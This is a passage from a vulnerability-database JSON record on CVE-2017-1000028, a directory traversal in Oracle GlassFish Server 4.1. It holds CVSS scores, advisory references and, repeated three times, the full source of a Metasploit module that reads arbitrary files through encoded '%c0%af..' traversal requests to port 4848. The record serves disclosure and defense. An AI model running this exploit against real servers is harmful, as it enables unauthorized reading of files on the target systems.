10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "href": "https://ubuntu.com/security/CVE-2017-1000028", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000028", "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904", "https://nvd.nist.gov/vuln/detail/CVE-2017-1000028", "https://launchpad.net/bugs/cve/CVE-2017-1000028", "https://security-tracker.debian.org/tracker/CVE-2017-1000028"], "cvelist": ["CVE-2017-1000028"], "immutableFields": [], "lastseen": "2021-11-22T21:41:22", "history": [{"bulletin": {"id": "UB:CVE-2017-1000028", "vendorId": null, "hash": "75c048a8f8351817fd4aa727eeb60ede", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2017-1000028", "description": "Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both\nauthenticated and unauthenticated Directory Traversal vulnerability, that\ncan be exploited by issuing a specially crafted HTTP GET request.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | vulnerable code not present in package.\n", "published": "2017-07-17T00:00:00", "modified": "2017-07-17T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {}, "href": "https://ubuntu.com/security/CVE-2017-1000028", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000028", "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904", "https://nvd.nist.gov/vuln/detail/CVE-2017-1000028", "https://launchpad.net/bugs/cve/CVE-2017-1000028", "https://security-tracker.debian.org/tracker/CVE-2017-1000028"], "cvelist": ["CVE-2017-1000028"], "immutableFields": [], "lastseen": "2021-06-30T22:29:52", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-1000028"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148892"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310806848"]}, {"type": "exploitdb", "idList": ["EDB-ID:45196", "EDB-ID:45198"]}, {"type": "nessus", "idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"]}], "modified": "2021-06-30T22:29:52", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2021-06-30T22:29:52", "rev": 2}}, "objectVersion": "1.5", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "glassfish"}], "bugs": []}, "lastseen": "2021-06-30T22:29:52", "differentElements": ["cvss2", "cvss3"], "edition": 1}, {"bulletin": {"id": "UB:CVE-2017-1000028", "vendorId": null, "hash": "c0ab08e44d331fc13f7ea7da1851a54d", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2017-1000028", "description": "Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both\nauthenticated and unauthenticated Directory Traversal vulnerability, that\ncan be exploited by issuing a specially crafted HTTP GET request.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | vulnerable code not present in package.\n", "published": "2017-07-17T00:00:00", "modified": "2017-07-17T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "href": "https://ubuntu.com/security/CVE-2017-1000028", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000028", "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904", "https://nvd.nist.gov/vuln/detail/CVE-2017-1000028", "https://launchpad.net/bugs/cve/CVE-2017-1000028", "https://security-tracker.debian.org/tracker/CVE-2017-1000028"], "cvelist": ["CVE-2017-1000028"], "immutableFields": [], "lastseen": "2021-07-30T23:47:07", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-1000028"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148892"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310806848"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"]}, {"type": "exploitdb", "idList": ["EDB-ID:45196", "EDB-ID:45198"]}, {"type": "nessus", "idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"]}], "modified": "2021-07-30T23:47:07", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2021-07-30T23:47:07", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "glassfish"}], "bugs": []}, "lastseen": "2021-07-30T23:47:07", "differentElements": ["affectedPackage"], "edition": 2}], "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-1000028"]}, {"type": "exploitdb", "idList": ["EDB-ID:45196", "EDB-ID:45198"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148892"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310806848"]}, {"type": "nessus", "idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"]}], "modified": "2021-11-22T21:41:22", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2021-11-22T21:41:22", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "status": "needs triage", "packageName": "glassfish"}], "bugs": [], "_object_type": "robots.models.ubuntucve.UbuntuCVEBulletin", "_object_types": ["robots.models.ubuntucve.UbuntuCVEBulletin", "robots.models.base.Bulletin"]}], "exploitdb": [{"id": "EDB-ID:45196", "hash": "20efe3749413b57dc1af54e8358fe1745c0c6b595dfe41f56e2cf9724d231824", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)", "description": "Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit). CVE-2017-1000028. Webapps exploit for Windows platform. Tags: Metasploit Frame...", "published": "2018-08-14T00:00:00", "modified": "2018-08-14T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/45196/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2017-1000028"], "lastseen": "2018-08-14T17:28:41", "history": [{"lastseen": "2018-08-14T17:28:41", "different_elements": ["cvss3", "cvss2"], "edition": 1, "bulletin": {"lastseen": "2018-08-14T17:28:41", "references": [], "description": "Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit). CVE-2017-1000028. Webapps exploit for Windows platform. Tags: Metasploit Frame...", "edition": 1, "cvss3": {}, "reporter": "Exploit-DB", "history": [], "published": "2018-08-14T00:00:00", "enchantments": {"score": {"rev": 2, "modified": "2018-08-14T17:28:41", "vector": "NONE", "value": 6.1}, "dependencies": {"rev": 2, "references": [{"idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"], "type": "nessus"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["EDB-ID:45198"], "type": "exploitdb"}, {"idList": ["CVE-2017-1000028"], "type": "cve"}, {"idList": ["OPENVAS:1361412562310806848"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}], "modified": "2018-08-14T17:28:41"}}, "title": "Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)", "type": "exploitdb", "objectVersion": "1.5", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-1000028"], "immutableFields": [], "modified": "2018-08-14T00:00:00", "href": "https://www.exploit-db.com/exploits/45196/", "id": "EDB-ID:45196", "viewCount": 58, "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "247e3e74151deb051bb07e106e21073b", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "916b5dbd201b469998d9b4a4c8bc4e08", "key": "type"}, {"hash": "247e3e74151deb051bb07e106e21073b", "key": "published"}, {"hash": "bdf8ed67a9997025a9a245b20ac4e383", "key": "cvelist"}, {"hash": "48f667a82f1161ef92ad8479a776b974", "key": "description"}, {"hash": "16a44243a5e846a464c070e955d715cf", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "a792e2393dff1e200b885c5245988f6f", "key": "cvss"}, {"hash": "5ed2b97009adfb56ee6766139303094f", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "e53848d9c7e659c4bd32f7af7ff99515", "key": "reporter"}], "hash": "5e54dc2734a8f27e754ad0a139fba198fb6b8124a26f3cc0db2fb044db528089"}}], "viewCount": 59, "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2018-08-14T17:28:41", "rev": 2}, "dependencies": {"references": [{"idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"], "type": "nessus"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["EDB-ID:45198"], "type": "exploitdb"}, {"idList": ["CVE-2017-1000028"], "type": "cve"}, {"idList": ["OPENVAS:1361412562310806848"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}], "modified": "2018-08-14T17:28:41", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://www.exploit-db.com/download/45196/", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Auxiliary\r\n include Msf::Auxiliary::Report\r\n include Msf::Auxiliary::Scanner\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Path Traversal in Oracle GlassFish Server Open Source Edition',\r\n 'Description' => %q{\r\n This module exploits an unauthenticated directory traversal vulnerability\r\n which exits in administration console of Oracle GlassFish Server 4.1, which is\r\n listening by default on port 4848/TCP.\r\n },\r\n 'References' =>\r\n [\r\n ['CVE', '2017-1000028'],\r\n ['URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904'],\r\n ['EDB', '39441']\r\n ],\r\n 'Author' =>\r\n [\r\n 'Trustwave SpiderLabs', # Vulnerability discovery\r\n 'Dhiraj Mishra' # Metasploit module\r\n ],\r\n 'DisclosureDate' => 'Aug 08 2015',\r\n 'License' => MSF_LICENSE\r\n ))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(4848),\r\n OptString.new('FILEPATH', [true, \"The path to the file to read\", '/windows/win.ini']),\r\n OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])\r\n ])\r\n end\r\n\r\n def run_host(ip)\r\n filename = datastore['FILEPATH']\r\n traversal = \"%c0%af..\" * datastore['DEPTH'] << filename\r\n\r\n res = send_request_raw({\r\n 'method' => 'GET',\r\n 'uri' => \"/theme/META-INF/prototype#{traversal}\"\r\n })\r\n\r\n unless res && res.code == 200\r\n print_error('Nothing was downloaded')\r\n return\r\n end\r\n\r\n vprint_good(\"#{peer} - #{res.body}\")\r\n path = store_loot(\r\n 'oracle.traversal',\r\n 'text/plain',\r\n ip,\r\n res.body,\r\n filename\r\n )\r\n print_good(\"File saved in: #{path}\")\r\n end\r\nend", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "scheme": null, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "bdf8ed67a9997025a9a245b20ac4e383"}, {"key": "cvss", "hash": "a792e2393dff1e200b885c5245988f6f"}, {"key": "cvss2", "hash": "9bc143c7676b7e5a3fd9537d7507310b"}, {"key": "cvss3", "hash": "9976eff579ef3bfd6a4237accaf3acdb"}, {"key": "description", "hash": "48f667a82f1161ef92ad8479a776b974"}, {"key": "href", "hash": "16a44243a5e846a464c070e955d715cf"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "247e3e74151deb051bb07e106e21073b"}, {"key": "published", "hash": "247e3e74151deb051bb07e106e21073b"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "e53848d9c7e659c4bd32f7af7ff99515"}, {"key": "title", "hash": "5ed2b97009adfb56ee6766139303094f"}, {"key": "type", "hash": "916b5dbd201b469998d9b4a4c8bc4e08"}]}, {"id": "EDB-ID:45198", "hash": "3067eeae1b7d891e1b67296aacb1ab41aa83efcae373383063c3fda066b04fed", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)", "description": "", "published": "2018-08-14T00:00:00", "modified": "2018-08-14T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/45198", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2017-1000028"], "lastseen": "2018-11-30T12:31:39", "history": [{"lastseen": "2018-11-30T12:31:39", "different_elements": ["cvss3", "cvss2"], "edition": 1, "bulletin": {"lastseen": "2018-11-30T12:31:39", "references": [], "description": "", "edition": 1, "cvss3": {}, "reporter": "Exploit-DB", "history": [], "published": "2018-08-14T00:00:00", "enchantments": {"score": {"rev": 2, "modified": "2018-11-30T12:31:39", "vector": "NONE", "value": 5.9}, "dependencies": {"rev": 2, "references": [{"idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"], "type": "nessus"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["EDB-ID:45196"], "type": "exploitdb"}, {"idList": ["CVE-2017-1000028"], "type": "cve"}, {"idList": ["OPENVAS:1361412562310806848"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}], "modified": "2018-11-30T12:31:39"}}, "title": "Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)", "type": "exploitdb", "objectVersion": "1.5", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-1000028"], "immutableFields": [], "modified": "2018-08-14T00:00:00", "href": "https://www.exploit-db.com/exploits/45198", "id": "EDB-ID:45198", "viewCount": 17, "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d0932c6876ba44537f85119b65226e96", "key": "href"}, {"hash": "247e3e74151deb051bb07e106e21073b", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "916b5dbd201b469998d9b4a4c8bc4e08", "key": "type"}, {"hash": "247e3e74151deb051bb07e106e21073b", "key": "published"}, {"hash": "bdf8ed67a9997025a9a245b20ac4e383", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "a792e2393dff1e200b885c5245988f6f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "806e495bd0771e039988c949c33aee7b", "key": "title"}, {"hash": "e53848d9c7e659c4bd32f7af7ff99515", "key": "reporter"}], "hash": "c4a2d80c8920490e9f03ded84c9e1004beef8d20544c5e3b49b4dd5fa4fd3801"}}], "viewCount": 18, "enchantments": {"score": {"value": 5.9, "vector": "NONE", "modified": "2018-11-30T12:31:39", "rev": 2}, "dependencies": {"references": [{"idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"], "type": "nessus"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["EDB-ID:45196"], "type": "exploitdb"}, {"idList": ["CVE-2017-1000028"], "type": "cve"}, {"idList": ["OPENVAS:1361412562310806848"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}], "modified": "2018-11-30T12:31:39", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://www.exploit-db.com/download/45198", "sourceData": "# Exploit title: Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)\r\n# Author: Dhiraj Mishra\r\n# Date: 2018-08-14\r\n# Software: Oracle Glassfish Server OSE\r\n# Version: 4.1\r\n# Software link: http://download.oracle.com/glassfish/4.1/release/glassfish-4.1.zip\r\n# CVE: 2017-1000028\r\n\r\n##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Auxiliary\r\n include Msf::Auxiliary::Report\r\n include Msf::Auxiliary::Scanner\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Path Traversal in Oracle GlassFish Server Open Source Edition',\r\n 'Description' => %q{\r\n This module exploits an unauthenticated directory traversal vulnerability\r\n which exits in administration console of Oracle GlassFish Server 4.1, which is\r\n listening by default on port 4848/TCP.\r\n },\r\n 'References' =>\r\n [\r\n ['CVE', '2017-1000028'],\r\n ['URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904'],\r\n ['EDB', '39441']\r\n ],\r\n 'Author' =>\r\n [\r\n 'Trustwave SpiderLabs', # Vulnerability discovery\r\n 'Dhiraj Mishra' # Metasploit module\r\n ],\r\n 'DisclosureDate' => 'Aug 08 2015',\r\n 'License' => MSF_LICENSE\r\n ))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(4848),\r\n OptString.new('FILEPATH', [true, \"The path to the file to read\", '/windows/win.ini']),\r\n OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])\r\n ])\r\n end\r\n\r\n def run_host(ip)\r\n filename = datastore['FILEPATH']\r\n traversal = \"%c0%af..\" * datastore['DEPTH'] << filename\r\n\r\n res = send_request_raw({\r\n 'method' => 'GET',\r\n 'uri' => \"/theme/META-INF/prototype#{traversal}\"\r\n })\r\n\r\n unless res && res.code == 200\r\n print_error('Nothing was downloaded')\r\n return\r\n end\r\n\r\n vprint_good(\"#{peer} - #{res.body}\")\r\n path = store_loot(\r\n 'oracle.traversal',\r\n 'text/plain',\r\n ip,\r\n res.body,\r\n filename\r\n )\r\n print_good(\"File saved in: #{path}\")\r\n end\r\nend", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "scheme": null, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "bdf8ed67a9997025a9a245b20ac4e383"}, {"key": "cvss", "hash": "a792e2393dff1e200b885c5245988f6f"}, {"key": "cvss2", "hash": "9bc143c7676b7e5a3fd9537d7507310b"}, {"key": "cvss3", "hash": "9976eff579ef3bfd6a4237accaf3acdb"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "d0932c6876ba44537f85119b65226e96"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "247e3e74151deb051bb07e106e21073b"}, {"key": "published", "hash": "247e3e74151deb051bb07e106e21073b"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "e53848d9c7e659c4bd32f7af7ff99515"}, {"key": "title", "hash": "806e495bd0771e039988c949c33aee7b"}, {"key": "type", "hash": "916b5dbd201b469998d9b4a4c8bc4e08"}]}], "packetstorm": [{"id": "PACKETSTORM:148892", "hash": "9e367a799a16af594228201c58d5e295", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Oracle GlassFish Server 4.1 Directory Traversal", "description": "", "published": "2018-08-13T00:00:00", "modified": "2018-08-13T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://packetstormsecurity.com/files/148892/Oracle-GlassFish-Server-4.1-Directory-Traversal.html", "reporter": "Mishra Dhiraj", "references": [], "cvelist": ["CVE-2017-1000028"], "lastseen": "2018-08-16T02:10:28", "history": [], "viewCount": 15, "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2018-08-16T02:10:28", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-1000028"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310806848"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"]}, {"type": "exploitdb", "idList": ["EDB-ID:45198", "EDB-ID:45196"]}, {"type": "nessus", "idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"]}], "modified": "2018-08-16T02:10:28", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://packetstormsecurity.com/files/download/148892/glassfish_traversal.rb.txt", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Auxiliary \ninclude Msf::Auxiliary::Report \ninclude Msf::Auxiliary::Scanner \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Path Traversal in Oracle GlassFish Server Open Source Edition', \n'Description' => %q{ \nThis module exploits an unauthenticated directory traversal vulnerability \nwhich exits in administration console of Oracle GlassFish Server 4.1, which is \nlistening by default on port 4848/TCP. \n}, \n'References' => \n[ \n['CVE', '2017-1000028'], \n['URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904'], \n['EDB', '39441'] \n], \n'Author' => \n[ \n'Trustwave SpiderLabs', # Vulnerability discovery \n'Dhiraj Mishra' # Metasploit module \n], \n'DisclosureDate' => 'Aug 08 2015', \n'License' => MSF_LICENSE \n)) \n \nregister_options( \n[ \nOpt::RPORT(4848), \nOptString.new('FILEPATH', [true, \"The path to the file to read\", '/windows/win.ini']), \nOptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ]) \n]) \nend \n \ndef run_host(ip) \nfilename = datastore['FILEPATH'] \ntraversal = \"%c0%af..\" * datastore['DEPTH'] << filename \n \nres = send_request_raw({ \n'method' => 'GET', \n'uri' => \"/theme/META-INF/prototype#{traversal}\" \n}) \n \nunless res && res.code == 200 \nprint_error('Nothing was downloaded') \nreturn \nend \n \nvprint_good(\"#{peer} - #{res.body}\") \npath = store_loot( \n'oracle.traversal', \n'text/plain', \nip, \nres.body, \nfilename \n) \nprint_good(\"File saved in: #{path}\") \nend \nend \n \n`\n", "_object_type": "robots.models.packetstorm.PacketstormBulletin", "_object_types": ["robots.models.packetstorm.PacketstormBulletin", "robots.models.base.Bulletin"]}], "openvas": [{"id": "OPENVAS:1361412562310806848", "hash": "5a4f0fb2d75e4aaf07f2e64418127d4b", "type": "openvas", "bulletinFamily": "scanner", "title": "Oracle Glass Fish Server Directory Traversal Vulnerability", "description": "This host is installed with Glass fish server\n and is prone to directory traversal vulnerability.", "published": "2016-01-27T00:00:00", "modified": "2020-05-08T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806848", "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "references": ["https://www.exploit-db.com/exploits/39241"], "cvelist": ["CVE-2017-1000028"], "lastseen": "2020-05-12T17:23:31", "history": [{"bulletin": {"id": "OPENVAS:1361412562310806848", "hash": "193ed04b82015c1810d804062ebd774e42478a483a2e29e243e3b6148693d6cc", "type": "openvas", "bulletinFamily": "scanner", "title": "Oracle Glass Fish Server Directory Traversal Vulnerability", "description": "This host is installed with Glass fish server\n and is prone to directory traversal vulnerability.", "published": "2016-01-27T00:00:00", "modified": "2018-10-01T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806848", "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "references": ["https://www.exploit-db.com/exploits/39241"], "cvelist": ["CVE-2017-1000028"], "lastseen": "2018-10-02T14:29:56", "history": [], "viewCount": 55, "enchantments": {"dependencies": {"modified": "2018-10-02T14:29:56", "references": [{"idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"], "type": "nessus"}, {"idList": ["EDB-ID:45198", "EDB-ID:45196"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["CVE-2017-1000028"], "type": "cve"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}]}, "score": {"value": 7.5, "vector": 